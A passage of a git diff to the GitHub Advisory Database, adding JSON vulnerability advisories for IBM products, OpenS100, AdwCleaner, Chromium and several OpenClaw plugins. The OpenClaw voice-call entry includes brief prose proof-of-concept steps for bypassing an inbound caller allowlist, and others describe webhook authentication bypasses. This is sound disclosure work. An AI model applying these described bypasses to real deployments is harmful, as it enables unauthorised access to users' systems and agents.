+ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23598" + }, + { + "type": "WEB", + "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05002en_us&docLocale=en_US" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vp3m-qh4p-wg7c/GHSA-vp3m-qh4p-wg7c.json b/advisories/unreviewed/2026/02/GHSA-vp3m-qh4p-wg7c/GHSA-vp3m-qh4p-wg7c.json new file mode 100644 index 0000000000000..f481da1a92ba1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vp3m-qh4p-wg7c/GHSA-vp3m-qh4p-wg7c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vp3m-qh4p-wg7c", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-0102" + ], + "details": "Under specific conditions, a malicious webpage may trigger autofill population after two consecutive taps, potentially without clear or intentional user consent. This could result in disclosure of stored autofill data such as addresses, email, or phone number metadata.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0102" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0102" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-359" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vq48-824m-7qhf/GHSA-vq48-824m-7qhf.json b/advisories/unreviewed/2026/02/GHSA-vq48-824m-7qhf/GHSA-vq48-824m-7qhf.json index 785e1070bd02b..7ff2918c99944 100644 --- a/advisories/unreviewed/2026/02/GHSA-vq48-824m-7qhf/GHSA-vq48-824m-7qhf.json +++ b/advisories/unreviewed/2026/02/GHSA-vq48-824m-7qhf/GHSA-vq48-824m-7qhf.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vq48-824m-7qhf", - "modified": "2026-02-17T15:31:35Z", + "modified": "2026-02-17T21:31:13Z", "published": "2026-02-17T15:31:35Z", "aliases": [ "CVE-2026-22208" ], "details": "OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capability restrictions, exposing standard libraries such as 'os' and 'io' to untrusted portrayal catalogues. An attacker can provide a malicious S-100 portrayal catalogue containing Lua scripts that execute arbitrary commands with the privileges of the OpenS100 process when a user imports the catalogue and loads a chart.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-vw2m-h749-pv59/GHSA-vw2m-h749-pv59.json b/advisories/unreviewed/2026/02/GHSA-vw2m-h749-pv59/GHSA-vw2m-h749-pv59.json new file mode 100644 index 0000000000000..70460d5124236 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vw2m-h749-pv59/GHSA-vw2m-h749-pv59.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vw2m-h749-pv59", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2025-36018" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 for Z hub component is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36018" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260162" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w2v5-vxvg-mqgh/GHSA-w2v5-vxvg-mqgh.json b/advisories/unreviewed/2026/02/GHSA-w2v5-vxvg-mqgh/GHSA-w2v5-vxvg-mqgh.json index 9b62631b0baa6..a3c5d1f63ae8c 100644 --- a/advisories/unreviewed/2026/02/GHSA-w2v5-vxvg-mqgh/GHSA-w2v5-vxvg-mqgh.json +++ b/advisories/unreviewed/2026/02/GHSA-w2v5-vxvg-mqgh/GHSA-w2v5-vxvg-mqgh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-w2v5-vxvg-mqgh", - "modified": "2026-02-17T18:32:57Z", + "modified": "2026-02-17T21:31:13Z", "published": "2026-02-17T18:32:57Z", "aliases": [ "CVE-2025-67905" ], "details": "Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a related issue to CVE-2023-28892. To exploit this, an attacker must create a file in a given folder path and intercept the application log file deletion flow.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-17T17:21:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-w7gq-6p98-xh22/GHSA-w7gq-6p98-xh22.json b/advisories/unreviewed/2026/02/GHSA-w7gq-6p98-xh22/GHSA-w7gq-6p98-xh22.json index fb983741d1b02..642990f28e6a5 100644 --- a/advisories/unreviewed/2026/02/GHSA-w7gq-6p98-xh22/GHSA-w7gq-6p98-xh22.json +++ b/advisories/unreviewed/2026/02/GHSA-w7gq-6p98-xh22/GHSA-w7gq-6p98-xh22.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-94" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-wj4m-c5pc-p9r9/GHSA-wj4m-c5pc-p9r9.json b/advisories/unreviewed/2026/02/GHSA-wj4m-c5pc-p9r9/GHSA-wj4m-c5pc-p9r9.json new file mode 100644 index 0000000000000..e553b9435d6ab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wj4m-c5pc-p9r9/GHSA-wj4m-c5pc-p9r9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj4m-c5pc-p9r9", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-33089" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 could allow a remote attacker to obtain sensitive information or perform unauthorized actions due to the use of hard coded user credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33089" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260162" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wm8j-hgw9-h534/GHSA-wm8j-hgw9-h534.json b/advisories/unreviewed/2026/02/GHSA-wm8j-hgw9-h534/GHSA-wm8j-hgw9-h534.json new file mode 100644 index 0000000000000..f8c52c623738e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wm8j-hgw9-h534/GHSA-wm8j-hgw9-h534.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wm8j-hgw9-h534", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-27899" + ], + "details": "IBM DB2 Recovery Expert for LUW 5.5 Interim Fix 002 discloses sensitive information in an environment variable that could aid in further attacks against the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27899" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-526" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wmq7-3p89-w6h8/GHSA-wmq7-3p89-w6h8.json b/advisories/unreviewed/2026/02/GHSA-wmq7-3p89-w6h8/GHSA-wmq7-3p89-w6h8.json index 426b38feca13c..39700aa88f517 100644 --- a/advisories/unreviewed/2026/02/GHSA-wmq7-3p89-w6h8/GHSA-wmq7-3p89-w6h8.json +++ b/advisories/unreviewed/2026/02/GHSA-wmq7-3p89-w6h8/GHSA-wmq7-3p89-w6h8.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-862" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-wrgv-jmfr-c4gr/GHSA-wrgv-jmfr-c4gr.json b/advisories/unreviewed/2026/02/GHSA-wrgv-jmfr-c4gr/GHSA-wrgv-jmfr-c4gr.json new file mode 100644 index 0000000000000..a0d94f20b63a4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrgv-jmfr-c4gr/GHSA-wrgv-jmfr-c4gr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrgv-jmfr-c4gr", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-36379" + ], + "details": "IBM Security QRadar EDR 3.12 through 3.12.23 IBM Security ReaQta uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36379" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260390" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-326" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrqj-g5w9-qq86/GHSA-wrqj-g5w9-qq86.json b/advisories/unreviewed/2026/02/GHSA-wrqj-g5w9-qq86/GHSA-wrqj-g5w9-qq86.json new file mode 100644 index 0000000000000..3aeb4bad3c3c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wrqj-g5w9-qq86/GHSA-wrqj-g5w9-qq86.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrqj-g5w9-qq86", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-27901" + ], + "details": "IBM DB2 Recovery Expert for LUW 5.5 Interim Fix 002 IBM Db2 Recovery Expert for Linux, UNIX and Windows is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers.  This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27901" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-644" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wxpc-f9fq-w9pq/GHSA-wxpc-f9fq-w9pq.json b/advisories/unreviewed/2026/02/GHSA-wxpc-f9fq-w9pq/GHSA-wxpc-f9fq-w9pq.json index 46321191a0f21..31fc90fce35ae 100644 --- a/advisories/unreviewed/2026/02/GHSA-wxpc-f9fq-w9pq/GHSA-wxpc-f9fq-w9pq.json +++ b/advisories/unreviewed/2026/02/GHSA-wxpc-f9fq-w9pq/GHSA-wxpc-f9fq-w9pq.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-610" + "CWE-610", + "CWE-611" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-x7fc-g3mg-7h5h/GHSA-x7fc-g3mg-7h5h.json b/advisories/unreviewed/2026/02/GHSA-x7fc-g3mg-7h5h/GHSA-x7fc-g3mg-7h5h.json new file mode 100644 index 0000000000000..dd8b316fefb88 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x7fc-g3mg-7h5h/GHSA-x7fc-g3mg-7h5h.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x7fc-g3mg-7h5h", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2024-43178" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43178" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260162" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json b/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json index 15217ea7fcdc0..de22b2120f16e 100644 --- a/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json +++ b/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xpp8-qpcr-c3rg", - "modified": "2026-02-13T21:31:39Z", + "modified": "2026-02-17T21:31:13Z", "published": "2026-02-13T21:31:39Z", "aliases": [ "CVE-2026-2441" @@ -26,6 +26,10 @@ { "type": "WEB", "url": "https://issues.chromium.org/issues/483569511" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-2441" } ], "database_specific": { From cc1f14b68a87f678dc7dc76839740b991eb37655 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 17 Feb 2026 21:38:00 +0000 Subject: [PATCH 132/215] Publish Advisories GHSA-4rj2-gpmh-qq5x GHSA-fhvm-j76f-qmjv GHSA-pchc-86f6-8758 GHSA-r5h9-vjqc-hq3r GHSA-rmxw-jxxx-4cpc --- .../GHSA-4rj2-gpmh-qq5x.json | 63 +++++++++++++ .../GHSA-fhvm-j76f-qmjv.json | 75 ++++++++++++++++ .../GHSA-pchc-86f6-8758.json | 88 +++++++++++++++++++ .../GHSA-r5h9-vjqc-hq3r.json | 70 +++++++++++++++ .../GHSA-rmxw-jxxx-4cpc.json | 63 +++++++++++++ 5 files changed, 359 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-4rj2-gpmh-qq5x/GHSA-4rj2-gpmh-qq5x.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-fhvm-j76f-qmjv/GHSA-fhvm-j76f-qmjv.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-r5h9-vjqc-hq3r/GHSA-r5h9-vjqc-hq3r.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-rmxw-jxxx-4cpc/GHSA-rmxw-jxxx-4cpc.json diff --git a/advisories/github-reviewed/2026/02/GHSA-4rj2-gpmh-qq5x/GHSA-4rj2-gpmh-qq5x.json b/advisories/github-reviewed/2026/02/GHSA-4rj2-gpmh-qq5x/GHSA-4rj2-gpmh-qq5x.json new file mode 100644 index 0000000000000..4d6bd69616268 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4rj2-gpmh-qq5x/GHSA-4rj2-gpmh-qq5x.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4rj2-gpmh-qq5x", + "modified": "2026-02-17T21:36:34Z", + "published": "2026-02-17T21:36:34Z", + "aliases": [], + "summary": "OpenClaw has an inbound allowlist policy bypass in voice-call extension (empty caller ID + suffix matching)", + "details": "### Summary\n\nAn authentication bypass in the optional `voice-call` extension/plugin allowed unapproved or anonymous callers to reach the voice-call agent when inbound policy was set to `allowlist` or `pairing`.\n\nDeployments that do not install/enable the `voice-call` extension are not affected.\n\n### Affected Packages / Versions\n\n- `openclaw` (npm): `<= 2026.2.1`\n- Fixed in: `>= 2026.2.2`\n\n### Details\n\nIn affected versions (for example `2026.2.1`), the inbound allowlist check in `extensions/voice-call/src/manager.ts` used suffix-based matching and accepted empty caller IDs after normalization.\n\nThis allowed two bypasses:\n\n1. Missing/empty `from` values normalized to an empty string, which caused the allowlist predicate to evaluate as allowed.\n2. Suffix-based matching meant any caller number whose digits ended with an allowlisted number would be accepted.\n\n### Proof Of Concept\n\n1. Configure the voice-call extension with `inboundPolicy: allowlist` and `allowFrom: [\"+15550001234\"]`.\n2. Place/trigger an inbound call with missing/empty caller ID (provider-dependent; for example anonymous/restricted caller). The call is accepted.\n3. Place a call from a number whose E.164 digits end with `15550001234` (for example `+99915550001234`). The call is accepted.\n\n### Impact\n\nOnly operators who install/enable the optional `voice-call` extension and use `inboundPolicy=allowlist` or `pairing` could have inbound access controls bypassed, potentially allowing unauthorized callers to reach auto-response and tool execution.\n\n### Fix\n\nThe fix hardens inbound policy handling:\n\n- Reject inbound calls when caller ID is missing.\n- Require strict equality when comparing normalized caller IDs against the allowlist (no suffix/prefix matching).\n- Add regression tests for missing caller ID, anonymous caller ID, and suffix-collision cases.\n\nFix commit(s):\n\n- `f8dfd034f5d9235c5485f492a9e4ccc114e97fdb`\n\nThanks @simecek for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4rj2-gpmh-qq5x" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/f8dfd034f5d9235c5485f492a9e4ccc114e97fdb" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:36:34Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-fhvm-j76f-qmjv/GHSA-fhvm-j76f-qmjv.json b/advisories/github-reviewed/2026/02/GHSA-fhvm-j76f-qmjv/GHSA-fhvm-j76f-qmjv.json new file mode 100644 index 0000000000000..02ab6913acbbe --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-fhvm-j76f-qmjv/GHSA-fhvm-j76f-qmjv.json @@ -0,0 +1,75 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fhvm-j76f-qmjv", + "modified": "2026-02-17T21:34:36Z", + "published": "2026-02-17T21:34:36Z", + "aliases": [], + "summary": "OpenClaw has a potential access-group authorization bypass if channel type lookup fails", + "details": "## Summary\n\nWhen Telegram webhook mode is enabled without a configured webhook secret, OpenClaw may accept unauthenticated HTTP POST requests at the Telegram webhook endpoint and trust attacker-controlled update JSON. This can allow forged Telegram updates that spoof `message.from.id` / `chat.id`, potentially bypassing sender allowlists and executing privileged bot commands.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `<= 2026.1.30`\n- Patched: `>= 2026.2.1`\n\n## Impact\n\nAn attacker who can reach the webhook endpoint can forge Telegram updates and impersonate allowlisted/paired senders by spoofing fields in the webhook payload (for example `message.from.id`). Impact depends on enabled commands/tools and the deployment’s network exposure.\n\n## Mitigations / Workarounds\n\n- Configure a strong `channels.telegram.webhookSecret` and ensure your reverse proxy forwards the `X-Telegram-Bot-Api-Secret-Token` header unchanged.\n\n## Fix Commit(s)\n\n- ca92597e1f9593236ad86810b66633144b69314d (config validation: `webhookUrl` requires `webhookSecret`)\n\nDefense-in-depth / supporting fixes:\n\n- 5643a934799dc523ec2ef18c007e1aa2c386b670 (default webhook listener bind host to loopback)\n- 3cbcba10cf30c2ffb898f0d8c7dfb929f15f8930 (bound webhook request body size/time)\n- 633fe8b9c17f02fcc68ecdb5ec212a5ace932f09 (runtime guard: reject webhook startup when secret is missing/empty)\n\n## Release Process Note\n\n`patched_versions` is set to the first fixed release (`2026.2.1`).\n\nThanks @yueyueL for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fhvm-j76f-qmjv" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/3cbcba10cf30c2ffb898f0d8c7dfb929f15f8930" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/5643a934799dc523ec2ef18c007e1aa2c386b670" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/633fe8b9c17f02fcc68ecdb5ec212a5ace932f09" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/ca92597e1f9593236ad86810b66633144b69314d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:34:36Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json b/advisories/github-reviewed/2026/02/GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json new file mode 100644 index 0000000000000..be7cb922e9814 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json @@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pchc-86f6-8758", + "modified": "2026-02-17T21:33:51Z", + "published": "2026-02-17T21:33:51Z", + "aliases": [ + "CVE-2026-26316" + ], + "summary": "OpenClaw BlueBubbles webhook auth bypass via loopback proxy trust", + "details": "### Summary\n\nIn affected versions, the optional BlueBubbles iMessage channel plugin could accept webhook requests as authenticated based only on the TCP peer address being loopback (`127.0.0.1`, `::1`, `::ffff:127.0.0.1`) even when the configured webhook secret was missing or incorrect. This does not affect the default iMessage integration unless BlueBubbles is installed and enabled.\n\n### Affected Packages / Versions\n\n- npm: `openclaw` `< 2026.2.13`\n- npm: `@openclaw/bluebubbles` `< 2026.2.13`\n\n### Details\n\nIf a deployment exposes the BlueBubbles webhook endpoint through a same-host reverse proxy (or an attacker can reach loopback via SSRF), an unauthenticated party may be able to inject inbound webhook events into the agent pipeline.\n\n### Fix Commit(s)\n\n- f836c385ffc746cb954e8ee409f99d079bfdcd2f\n- 743f4b28495cdeb0d5bf76f6ebf4af01f6a02e5a (defense-in-depth)\n\n### Mitigations\n\n- Set a non-empty BlueBubbles webhook password.\n- Avoid deployments where a public-facing reverse proxy forwards to a loopback-bound Gateway without strong upstream authentication.\n\nThanks @MegaManSec (https://joshua.hu) of [AISLE Research Team](https://aisle.com/) for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "@openclaw/bluebubbles" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-pchc-86f6-8758" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/743f4b28495cdeb0d5bf76f6ebf4af01f6a02e5a" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/f836c385ffc746cb954e8ee409f99d079bfdcd2f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.12" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:33:51Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-r5h9-vjqc-hq3r/GHSA-r5h9-vjqc-hq3r.json b/advisories/github-reviewed/2026/02/GHSA-r5h9-vjqc-hq3r/GHSA-r5h9-vjqc-hq3r.json new file mode 100644 index 0000000000000..d8abd5797eaa7 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-r5h9-vjqc-hq3r/GHSA-r5h9-vjqc-hq3r.json @@ -0,0 +1,70 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5h9-vjqc-hq3r", + "modified": "2026-02-17T21:36:15Z", + "published": "2026-02-17T21:36:15Z", + "aliases": [], + "summary": "Nextcloud Talk allowlist bypass via actor.name display name spoofing", + "details": "## Summary\n\nIn affected versions of the optional Nextcloud Talk plugin (installed separately; not bundled with the core OpenClaw install), an untrusted webhook field (`actor.name`, display name) could be treated as an allowlist identifier. An attacker could change their Nextcloud display name to match an allowlisted user ID and bypass DM or room allowlists.\n\n## Details\n\nNextcloud Talk webhook payloads provide a stable sender identifier (`actor.id`) and a mutable display name (`actor.name`). In affected versions, the plugin’s allowlist matching accepted equality on the display name, which is attacker-controlled.\n\n## Affected Packages / Versions\n\n- Package: `@openclaw/nextcloud-talk` (npm)\n- Affected: `<= 2026.2.2`\n- Fixed: `>= 2026.2.6`\n\nNote: This advisory applies to the optional Nextcloud Talk plugin package. Core `openclaw` is not impacted unless you installed and use `@openclaw/nextcloud-talk`.\n\n## Fix Commit(s)\n\n- [6b4b6049b47c3329a7014509594647826669892d](https://github.com/openclaw/openclaw/commit/6b4b6049b47c3329a7014509594647826669892d)\n\n## Timeline\n\n- Introduced: 